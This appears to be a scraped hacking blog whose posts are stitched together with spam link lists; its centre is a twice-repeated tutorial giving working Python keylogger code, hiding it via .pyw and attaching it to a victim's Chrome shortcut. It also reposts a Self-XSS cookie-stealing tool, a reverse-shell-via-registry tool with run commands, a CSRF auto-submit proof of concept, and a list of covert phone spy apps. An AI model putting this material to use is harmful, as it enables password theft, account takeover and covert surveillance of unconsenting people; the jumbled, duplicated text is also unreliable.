sexta-feira, 22 de maio de 2020

How To Make A Simple And Powerful Keylogger Using Python

A keylogger is a computer program which can be written using any computer programming language such as c++ when you install it on a Victim system it can keep the records of every keystroke in a text file. Keylogger is mainly used to steal confidential data such as passwords, credit card numbers etc.

How to make a python keylogger?

A keylogger can be programmed using any programming language such as c++, java, c# e.tc. For this tutorial, I will use python to make a keylogger, because python is flexible, powerful and simple to understand even a non-programmer can use python to make a keylogger.
Requirements to create a python keylogger
  • Computer With Operating system: Windows, Mac os or Linux
  • Python must be installed on the system
  • Pip (Python index package ) you will need this to install python software packages.
  • Pypiwin32 and PyHook packages
  • Basic understanding of computers
You will learn to install these things one by one. If you have already installed and configured the python development kit feel free to skip Part 1.
Part 1: Downloading Python and pip, setting up the environment to create the keylogger.Step 1:
Download python development kit by clicking here.
Choose python 2.7 because I am using this version. It is ok if you have a different version of python this method will work on every version of python.
Step 2:
Installation of python is pretty simple.Open the python setup file, Mark the checkboxes Very important else you have to set the python path manually, and click on Install Now.
Step 3:
You need Pypiwin32 and PyHook python packages to create python keylogger. To install these packages you need pip, you can install Pypiwin32 and PyHook without using pip which is not recommended.
To download pip go to https://pip.pypa.io/en/stable/installing/ and Save link as by right clicking on get-pip.py. when the download is done, just run the get-pip.py file.
Now you need to set the Variable path for pip to do this right click on the computer icon and choose properties.
Now click on the Advanced system settings
Choose Environment Variables.
Choose New, Set the Variable name: PATH and Variable value as C:\Python27\Scripts
Click on ok.
Part 2: Installing Pypiwin32 and PyHook python Packages using pip:
Open Command Prompt(CMD) and type: pip installs Pypiwin32 press the Enter Key, wait for the installation to complete. After the Pypiwin32 package installation type: pip install PyHook press the Enter Key and wait for the installation to complete.When done close the Command Prompt.
Part 3: Creating and testing the python keylogger:
Now you have configured your environment and installed all the necessary packages, let's start creating the keylogger. Click on the start menu and scroll down until you find Python 2.7, run python IDLE(GUI) by clicking on it.
Go to the File, from the drop-down menu choose New file.

Python Keylogger source code:

Copy these lines of code and paste into the new file. Modify the directory in the second line of code to your own location e.g 'C:\test\log.txt' this will create a folder named test in C save the log.txt file there when the Keylogger start.
import pyHook, pythoncom, sys, logging
file_log='F:\\test\\log.txt'
def onKeyboardEvent(event):
logging.basicConfig(filename=file_log,level=logging.DEBUG,format='%(message)s')
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
hooks_manager=pyHook.HookManager()
hooks_manager.KeyDown=onKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
Save your file as a test.pyw at any location you want, the .pyw extension is very important because of it the python keylogger will run in the background without notifying the user.
The Python Keylogger is now completed you can test it out by opening it and typing some text in your browser, go to the log.txt file which is in the F:\test\log.txt on my PC. You will find your log.txt file in C:\test\log.txt.But what if you want to test it on someone else computer? you want to run it without the user knowing that it has been launched, this can be done by attaching it to the program that the victim always uses such as Google Chrome.
Let's make the python keylogger auto-launchable by attaching it the Google Chrome.
Copy the following code and paste into notepad. Save it by giving .bat extension e.g launch.bat in a hidden location, e.g c:\test\launch.bat
Now right click on the google chrome desktop shortcut icon and click on properties. You will see a field called Target. Change the target field to the batch file launch.bat directory that you created. let's say you have saved your launch.bat file in a test folder in C, Then change the target field with "C:\test\launch.bat". Now, whenever the user opens chrome the keylogger will run automatically.

Related posts


quinta-feira, 21 de maio de 2020

How To Install And Config Modlishka Tool - Most Advance Reverse Proxy Phishing

Continue reading

Self-XSS - Self-XSS Attack Using Bit.Ly To Grab Cookies Tricking Users Into Running Malicious Code


Self-XSS attack using bit.ly to grab cookies tricking users into running malicious code

How it works?
Self-XSS is a social engineering attack used to gain control of victims' web accounts by tricking users into copying and pasting malicious content into their browsers. Since Web browser vendors and web sites have taken steps to mitigate this attack by blocking pasting javascript tag, I figure out a way of doing that using Bit.ly, so we can create a redirect pointing to "website.com/javascript:malicious_code". If the user is tricked to run the javascript code after "website.com/" the cookies of its authenticated/logged session of website.com will be sent to the attacker.


Features:
Port Forwarding using Ngrok and shortner using Bitly.com (Register for free)

Requirement
https://bitly.com account (Register for free)

Legal disclaimer:
Usage of Self-XSS for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

Usage:
git clone https://github.com/thelinuxchoice/self-xss
cd self-xss
bash self-xss.sh

Author: https://github.com/thelinuxchoice/self-xss
Twitter: https://twitter.com/linux_choice




via KitPloit

Related links


  1. Ethical Hacking
  2. Ethical Hacking Course
  3. Wifi Hacking

quarta-feira, 20 de maio de 2020

CSRF Referer Header Strip

Intro

Most of the web applications I see are kinda binary when it comes to CSRF protection; either they have one implemented using CSRF tokens (and more-or-less covering the different functions of the web application) or there is no protection at all. Usually, it is the latter case. However, from time to time I see application checking the Referer HTTP header.

A couple months ago I had to deal with an application that was checking the Referer as a CSRF prevention mechanism, but when this header was stripped from the request, the CSRF PoC worked. BTW it is common practice to accept empty Referer, mainly to avoid breaking functionality.

The OWASP Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet tells us that this defense approach is a baaad omen, but finding a universal and simple solution on the Internetz to strip the Referer header took somewhat more time than I expected, so I decided that the stuff that I found might be useful for others too.

Solutions for Referer header strip

Most of the techniques I have found were way too complicated for my taste. For example, when I start reading a blog post from Egor Homakov to find a solution to a problem, I know that I am going to:
  1. learn something very cool;
  2. have a serious headache from all the new info at the end.
This blog post from him is a bit lighter and covers some useful theoretical background, so make sure you read that first before you continue reading this post. He shows a few nice tricks to strip the Referer, but I was wondering; maybe there is an easier way?

Rich Lundeen (aka WebstersProdigy) made an excellent blog post on stripping the Referer header (again, make sure you read that one first before you continue). The HTTPS to HTTP trick is probably the most well-known one, general and easy enough, but it quickly fails the moment you have an application that only runs over HTTPS (this was my case).

The data method is not browser independent but the about:blank trick works well for some simple requests. Unfortunately, in my case the request I had to attack with CSRF was too complex and I wanted to use XMLHttpRequest. He mentions that in theory, there is anonymous flag for CORS, but he could not get it work. I also tried it, but... it did not work for me either.

Krzysztof Kotowicz also wrote a blog post on Referer strip, coming to similar conclusions as Rich Lundeen, mostly using the data method.

Finally, I bumped into Johannes Ullrich's ISC diary on Referer header and that led to me W3C's Referrer Policy. So just to make a dumb little PoC and show that relying on Referer is a not a good idea, you can simply use the "referrer" meta tag (yes, that is two "r"-s there).

The PoC would look something like this:
<html>
<meta name="referrer" content="never">
<body>
<form action="https://vistimsite.com/function" method="POST">
<input type="hidden" name="param1" value="1" />
<input type="hidden" name="param2" value="2" />
...
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

Conclusion

As you can see, there is quite a lot of ways to strip the Referer HTTP header from the request, so it really should not be considered a good defense against CSRF. My preferred way to make is PoC is with the meta tag, but hey, if you got any better solution for this, use the comment field down there and let me know! :)

Related links


How To Make A Simple And Powerful Keylogger Using Python

A keylogger is a computer program which can be written using any computer programming language such as c++ when you install it on a Victim system it can keep the records of every keystroke in a text file. Keylogger is mainly used to steal confidential data such as passwords, credit card numbers etc.

How to make a python keylogger?

A keylogger can be programmed using any programming language such as c++, java, c# e.tc. For this tutorial, I will use python to make a keylogger, because python is flexible, powerful and simple to understand even a non-programmer can use python to make a keylogger.
Requirements to create a python keylogger
  • Computer With Operating system: Windows, Mac os or Linux
  • Python must be installed on the system
  • Pip (Python index package ) you will need this to install python software packages.
  • Pypiwin32 and PyHook packages
  • Basic understanding of computers
You will learn to install these things one by one. If you have already installed and configured the python development kit feel free to skip Part 1.
Part 1: Downloading Python and pip, setting up the environment to create the keylogger.Step 1:
Download python development kit by clicking here.
Choose python 2.7 because I am using this version. It is ok if you have a different version of python this method will work on every version of python.
Step 2:
Installation of python is pretty simple.Open the python setup file, Mark the checkboxes Very important else you have to set the python path manually, and click on Install Now.
Step 3:
You need Pypiwin32 and PyHook python packages to create python keylogger. To install these packages you need pip, you can install Pypiwin32 and PyHook without using pip which is not recommended.
To download pip go to https://pip.pypa.io/en/stable/installing/ and Save link as by right clicking on get-pip.py. when the download is done, just run the get-pip.py file.
Now you need to set the Variable path for pip to do this right click on the computer icon and choose properties.
Now click on the Advanced system settings
Choose Environment Variables.
Choose New, Set the Variable name: PATH and Variable value as C:\Python27\Scripts
Click on ok.
Part 2: Installing Pypiwin32 and PyHook python Packages using pip:
Open Command Prompt(CMD) and type: pip installs Pypiwin32 press the Enter Key, wait for the installation to complete. After the Pypiwin32 package installation type: pip install PyHook press the Enter Key and wait for the installation to complete.When done close the Command Prompt.
Part 3: Creating and testing the python keylogger:
Now you have configured your environment and installed all the necessary packages, let's start creating the keylogger. Click on the start menu and scroll down until you find Python 2.7, run python IDLE(GUI) by clicking on it.
Go to the File, from the drop-down menu choose New file.

Python Keylogger source code:

Copy these lines of code and paste into the new file. Modify the directory in the second line of code to your own location e.g 'C:\test\log.txt' this will create a folder named test in C save the log.txt file there when the Keylogger start.
import pyHook, pythoncom, sys, logging
file_log='F:\\test\\log.txt'
def onKeyboardEvent(event):
logging.basicConfig(filename=file_log,level=logging.DEBUG,format='%(message)s')
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
hooks_manager=pyHook.HookManager()
hooks_manager.KeyDown=onKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
Save your file as a test.pyw at any location you want, the .pyw extension is very important because of it the python keylogger will run in the background without notifying the user.
The Python Keylogger is now completed you can test it out by opening it and typing some text in your browser, go to the log.txt file which is in the F:\test\log.txt on my PC. You will find your log.txt file in C:\test\log.txt.But what if you want to test it on someone else computer? you want to run it without the user knowing that it has been launched, this can be done by attaching it to the program that the victim always uses such as Google Chrome.
Let's make the python keylogger auto-launchable by attaching it the Google Chrome.
Copy the following code and paste into notepad. Save it by giving .bat extension e.g launch.bat in a hidden location, e.g c:\test\launch.bat
Now right click on the google chrome desktop shortcut icon and click on properties. You will see a field called Target. Change the target field to the batch file launch.bat directory that you created. let's say you have saved your launch.bat file in a test folder in C, Then change the target field with "C:\test\launch.bat". Now, whenever the user opens chrome the keylogger will run automatically.

Related links


  1. Curso De Growth Hacking
  2. Libro De Hacking
  3. Hacker Definicion Informatica
  4. Experto En Seguridad Informática
  5. Programas Para Hackear

DEFINATION OF HACKING

DEFINATION OF HACKING

Hacking is an attempt to exploit a  computer system vulnerabilities or a private network inside a computer to gain unauthorized acess.
Hacking is identifying and exploiting weakness in computer system and/ or computer networks for finding the vulnerability and loopholes.
Related news

Nemesis: A Packet Injection Utility


"Nemesis is a command-line network packet injection utility for UNIX-like and Windows systems. You might think of it as an EZ-bake packet oven or a manually controlled IP stack. With Nemesis, it is possible to generate and transmit packets from the command line or from within a shell script. Nemesis attacks directed through fragrouter could be a most powerful combination for the system auditor to find security problems that could then be reported to the vendor(s)." read more...

Website: http://www.packetfactory.net/projects/nemesis

Related articles
  1. Hacking Social
  2. El Libro Del Hacker
  3. Hacking Net
  4. Hacking Hardware Tools
  5. Experto En Seguridad Informática
  6. Geekprank Hacking
  7. Rom Hacking
  8. Ingeniería Social El Arte Del Hacking Personal
  9. Wifi Hacking App

$$$ Bug Bounty $$$

What is Bug Bounty ?



A bug bounty program, also called a vulnerability rewards program (VRP), is a crowdsourcing initiative that rewards individuals for discovering and reporting software bugs. Bug bounty programs are often initiated to supplement internal code audits and penetration tests as part of an organization's vulnerability management strategy.




Many software vendors and websites run bug bounty programs, paying out cash rewards to software security researchers and white hat hackers who report software vulnerabilities that have the potential to be exploited. Bug reports must document enough information for for the organization offering the bounty to be able to reproduce the vulnerability. Typically, payment amounts are commensurate with the size of the organization, the difficulty in hacking the system and how much impact on users a bug might have.


Mozilla paid out a $3,000 flat rate bounty for bugs that fit its criteria, while Facebook has given out as much as $20,000 for a single bug report. Google paid Chrome operating system bug reporters a combined $700,000 in 2012 and Microsoft paid UK researcher James Forshaw $100,000 for an attack vulnerability in Windows 8.1.  In 2016, Apple announced rewards that max out at $200,000 for a flaw in the iOS secure boot firmware components and up to $50,000 for execution of arbitrary code with kernel privileges or unauthorized iCloud access.


While the use of ethical hackers to find bugs can be very effective, such programs can also be controversial. To limit potential risk, some organizations are offering closed bug bounty programs that require an invitation. Apple, for example, has limited bug bounty participation to few dozen researchers.

Related articles


  1. Capture The Flag Hacking
  2. Hacking Linux
  3. Como Aprender A Ser Hacker
  4. Drupal Hacking
  5. Como Ser Un Buen Hacker
  6. Aprender Hacking Etico
  7. Hacking Wikipedia
  8. Hacking Time
  9. Nivel Basico
  10. El Mejor Hacker
  11. Sean Ellis Hacking Growth
  12. Rom Hacking Pokemon
  13. Hacking Websites
  14. Elhacker Ip
  15. Curso Growth Hacking
  16. Hacking To The Gate

terça-feira, 19 de maio de 2020

Evilreg - Reverse Shell Using Windows Registry Files (.Reg)


Reverse shell using Windows Registry file (.reg).

Features:

Requirements:
  • Ngrok Authtoken (for TCP Tunneling): Sign up at: https://ngrok.com/signup
  • Your authtoken is available on your dashboard: https://dashboard.ngrok.com
  • Install your auhtoken: ./ngrok authtoken <YOUR_AUTHTOKEN>
  • Target must reboot/re-login after installing the .reg file

Legal disclaimer:
Usage of Evilreg for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

Usage:
git clone https://github.com/thelinuxchoice/evilreg
cd evilreg
bash evilreg.sh

Author: github.com/thelinuxchoice
Twitter: twitter.com/linux_choice





via KitPloit

More info


Linux Stack Protection By Default

Modern gcc compiler (v9.2.0) protects the stack by default and you will notice it because instead of SIGSEGV on stack overflow you will get a SIGABRT, but it also generates coredumps.




In this case the compiler adds the variable local_10. This variable helds a canary value that is checked at the end of the function.
The memset overflows the four bytes stack variable and modifies the canary value.



The 64bits canary 0x5429851ebaf95800 can't be predicted, but in specific situations is not re-generated and can be bruteforced or in other situations can be leaked from memory for example using a format string vulnerability or an arbitrary read wihout overflowing the stack.

If the canary doesn't match, the libc function __stack_chck_fail is called and terminates the prorgam with a SIGABORT which generates a coredump, in the case of archlinux managed by systemd and are stored on "/var/lib/systemd/coredump/"


❯❯❯ ./test 
*** stack smashing detected ***: terminated
fish: './test' terminated by signal SIGABRT (Abort)

❯❯❯ sudo lz4 -d core.test.1000.c611b7caa58a4fa3bcf403e6eac95bb0.1121.1574354610000000.lz4
[sudo] password for xxxx: 
Decoding file core.test.1000.c611b7caa58a4fa3bcf403e6eac95bb0.1121.1574354610000000 
core.test.1000.c611b : decoded 249856 bytes 

 ❯❯❯ sudo gdb /home/xxxx/test core.test.1000.c611b7caa58a4fa3bcf403e6eac95bb0.1121.1574354610000000 -q 


We specify the binary and the core file as a gdb parameters. We can see only one LWP (light weight process) or linux thread, so in this case is quicker to check. First of all lets see the back trace, because in this case the execution don't terminate in the segfaulted return.




We can see on frame 5 the address were it would had returned to main if it wouldn't aborted.



Happy Idea: we can use this stack canary aborts to detect stack overflows. In Debian with prevous versions it will be exploitable depending on the compilation flags used.
And note that the canary is located as the last variable in the stack so the previous variables can be overwritten without problems.




More info
  1. El Mejor Hacker Del Mundo
  2. Hacking Aves
  3. Android Hacking
  4. Hacking Marketing
  5. Certificacion Hacking Etico
  6. Hacking Traduccion
  7. Hacking Simulator

Top Linux Commands Related To Hardware With Descriptive Definitions


Commands in Linux are just the keys to explore and close the Linux. As you can do things manually by simple clicking over the programs just like windows to open an applications. But if you don't have any idea about commands of Linux and definitely you also don't know about the Linux terminal. You cannot explore Linux deeply. Because terminal is the brain of the Linux and you can do everything by using Linux terminal in any Linux distribution. So, if you wanna work over the Linux distro then you should know about the commands as well. In this blog you will exactly get the content about Linux hardware commands which are related to CPU and memory processes.

dmesg

The dmesg command is used in Linux distribution for the sake of detecting hardware and boot messages in the Linux system.

cat /proc/cpuinfo

The cat command is basically used to read something over the terminal like cat index.py will display all the content which exist in index.py over the terminal. So cat /proc/cpuinfo will display the model of the CPU over the terminal.

cat /proc/meminfo

This command is similar to the above command but the only difference is that this command shows the information of hardware memory over the terminal. Because it will open the memory info file over the terminal.

cat /proc/interrupts

This command is also similar to the above command but there is the difference of one thing that this command will display lists the number of interrupts per CPU per input output device.

lshw

This command is used in Linux operating system to displays information on hardware configuration of the system in Linux.

lsblk

The "lsblk" command is used in Linux operating system to displays block device related information in the Linux operating system.

dmidecode

The "dmidecode" command is used in Linux distributions to display the information about hardware from the BIOS.

hdparm -i /dev/sda

The hdparm command basically used to display the information about the disks available in the system. If you wanna know the information about the "sda" disk so just type "hdparm -i /dev/sda" and if you wanna know the information about "sdb" so just type "hdparm -i /dev/sdb".

hdparm -tT

The "hdparm" command is used for displaying the information about disks as we discussed in above command. If you wanna do a read speed test on the disk sda or sdb just type the command "hdparm -tT /dev/sda".

badblocks -s /dev/sda

This command is used in linux to display test operations for unreadable blocks on disk sda. If the command is like "badblocks -s /dev/sdb" it will display test operations for unreadable blocks on disk sdb.Related posts
  1. Hacking Etico Que Es
  2. Hacking Traduccion
  3. Ethical Hacking Certification
  4. Hacking Bluetooth Speaker
  5. Hacking Python
  6. Como Ser Un Buen Hacker
  7. Hacking Net
  8. Escuela Travel Hacking
  9. Cómo Se Escribe Hacker
  10. Growth Hacking
  11. Hacking Simulator

Top 20 Android Spy Apps That Will.Make U Fell Like A Dectitive

             Top 10 Best android spy apps.                 

t's worth to note that there are plenty of Android spy apps available on the Google Play Store, but mentioning all of them is not possible. So, in this article, we have listed the one that's popular and used by many. So, let's explore the list of best spy apps 2019.

#1 Spy Camera OS

Spy Camera OS

This app permits users to capture images secretly. This app provides a smart way to shoot photos with a hidden camera interface so people wouldn't notice that you are taking pictures of them. Also, every sound and flash etc get disabled in this app.

#2 Ear Spy

Ear Spy

This is an awesome app to record even low voices. By this app, you can place your phone in the other room and can listen to the voices of that room by your Bluetooth handset. This app actually records the sound and then amplifies its recording and give you the amplified clear voices.

#3 Ip Cam Viewer

Ip Cam Viewer

This awesome app allows to remotely view and control your IP Camera, DVR, Network Video Recorder, traffic cameras, CCTV or WebCam from an android device. In its new version, you can also get the notification on detecting motion on the device. This app can automatically start recording whenever it detects motion.

#4 Automatic Call Recorder

Automatic Call Recorder

This is another best Spy App that one can have on their Android smartphone. This app gets automatically launched whenever you make or receive any call. It records all the conversation b/w speakers and also the surrounding noise of the device in which it is installed.

#5 Monitor Call Sms Location

Monitor Call Sms Location

This is another good spy app to remotely monitor SMS, Photo, Location, call logs and many more things on an Android device. This will exact location of the targeted device through a web-portal even if GPS disabled on the target device. The app comes with the three-day free trial option.

#6 Anti Spy Mobile

Anti Spy Mobile

You don't know whether you had installed any spyware software on your phone? Use this app to instantly find the spyware. The Android app uses advanced detection techniques to detect new spyware. So, with this app, you can easily protect yourself from Android spyware.

#7 Hidden Eye

Hidden Eye

Ever wanted to know who tried snooping on your phone while you were away. Your friends or family member might have tried to unlock your phone. Hidden Eye is a simple app with no frills that will photograph the person when they try to unlock your phone.

#8 AppLock

AppLock

Applock is the most downloaded app lock in Play Store. Protect privacy with password, pattern, fingerprint lock. AppLock can lock Facebook, Whatsapp, Gallery, Messenger, SMS, Contacts, Gmail, Settings, incoming calls and any app you choose. Prevent unauthorized access and guard privacy. Ensure security.

#9 Hide Calls Automatically

Hide Calls Automatically

With this app, all outgoing, incoming and missed calls coming from private contacts will be deleted automatically from calls Log of your phone! No icon of this app will appear in your list of applications on your phone.

#10 Truecaller: Caller ID & Dialer

Truecaller

Truecaller is the only dialer you'll ever need with the ability to identify unknown callers and block unwanted calls. See names and photos of people who call, even if they aren't saved in your phonebook. And know when friends are free to talk, making your calling experience smarter and more delightful.

#11 Cell Tracker

Cell Tracker

You can use the cell tracker Android app to keep track of the location of your smartphone. With the help of this app, you can track all the locations you have visited in the last few days with your Android phone. To check the locations visited you have to launch the app and click on "View Now". No need to turn on the GPS.

#12 Secret Calls

Secret Calls

With the help of this app, all outgoing, Incoming and Missed Calls coming from private contacts will be deleted automatically from Calls Log of your phone! No icon of this app will appear in your list of applications on your phone.

#13 Spy Camera

Spy Camera

This is another Spy app on the list which provides one-touch to capture image feature. The app actually has lots of useful features. With the help of this app, you can find your lost phone because this app allows you to set up a number. When you lost your phone, just SMS to this phone and it will take a picture and upload to drive.

#14 Truecaller

Truecaller

Truecaller is a popular Android app which is used every day to identify unknown calls, block spam calls and spam SMS. It filters out the unwanted and lets you connect with people who matter.

#15 Whoscall – Caller ID

Whoscall - Caller ID

Whoscall, the best caller ID App that identifies unknown calls and blocks annoying spams, robocall & telemarketing with more than 50 million downloads and over 1 billion numbers data. It also got the call blocker that can be used to blacklist or whitelist contacts stored on your smartphone.

#16 Norton Family parental control

Norton Family parental control

Norton Family parental control is basically an Android app that is meant to keep kids safe online. However, this is nothing sort of a spy app. The app can help you to supervise online activity. You can easily keep track of sites which your friend visit and what they search if you install Norton Family Parental control on their phone.

#17 Smart Hide Calculator

Smart Hide Calculator

The app doesn't help users to spy on others. But, it can give you a detective type feeling. Smart hide calculator is a fully functional calculator app but with a little twist. Once you enter the password and press the '=' button then boom you are presented to an interface where you can hide, unhide pictures, videos, documents or files with any file extension.

#18 Hidden Eye

Hidden Eye

Ever wanted to know who tried snooping into your phone while you were away. Your friends or family member might have tried to unlock your phone. Hidden Eye is a simple app with no frills that will photograph the person when they try to unlock your phone.

#19 Background Video Recorder

Background Video Recorder

This is another best Android spy app that helps users to record what's happening behind them. Background Video Recorder is basically a camera app that records videos silently on the background. The app eliminates the camera shutter sounds, camera previews and it can also record videos when the screen is off.

#20 Kids Place

Kids Place

Kids Place is another best parental control app in the list and its meant to protect your kids' online activities. However, if you don't have kids, you can use the app to track other devices. The app gives you full control over other devices and you can control everything including calls, text, internet browsing, apps, etc.

@EVERYTHING NT

Related word